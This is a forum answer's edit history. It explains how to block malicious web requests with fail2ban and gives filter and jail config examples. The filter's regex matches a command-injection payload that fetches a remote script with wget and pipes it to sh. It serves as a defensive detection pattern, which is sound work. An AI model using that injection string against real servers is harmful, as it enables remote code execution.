Post History
If these requests are logged into a log file you can install fail2ban and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration ...
Answer
#2: Post edited
by
GeraldS
·
2024-10-07T11:22:36Z (about 1 month ago)
added example
If these requests are logged into a log file you can install `fail2ban` and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration of your choosing.
- If these requests are logged into a log file you can install [`fail2ban`](https://github.com/fail2ban/fail2ban) and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration of your choosing.
- This would be a very basic (and untested) example:
- You create a service definition `/etc/fail2ban/filter.d/myservice.conf`:
- ```ini
- [Definition]
- failregex = \$\(id>`wget\+http:\/\/\[.+\]\/t\+-O-\+\|\+sh`
- ```
- You can test it with the command `fail2ban-regex`:
- ```
- fail2ban-regex /var/log/myservice.log /etc/fail2ban/filter.d/myservice.conf
- ```
- Then you create a jail that uses this service in `/etc/fail2ban/jail.d/myservice.conf`
- ```ini
- # service name
- [myservice]
- # turn on /off
- enabled = true
- # ports to ban (numeric or text)
- port = http,https
- # filter from previous step
- filter = myservice
- # file to parse
- logpath = /var/log/myservice.log
- # ban rule:
- # 5 times on 1 minute
- maxretry = 5
- findtime = 60
- # ban on 10 minutes
- bantime = 600
- ```
- This assumes that your service is accessed via regular HTTP/HTTPS ports, those are getting blocked.
#1: Initial revision
by
GeraldS
·
2024-10-02T13:59:07Z (about 2 months ago)
If these requests are logged into a log file you can install `fail2ban` and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration of your choosing.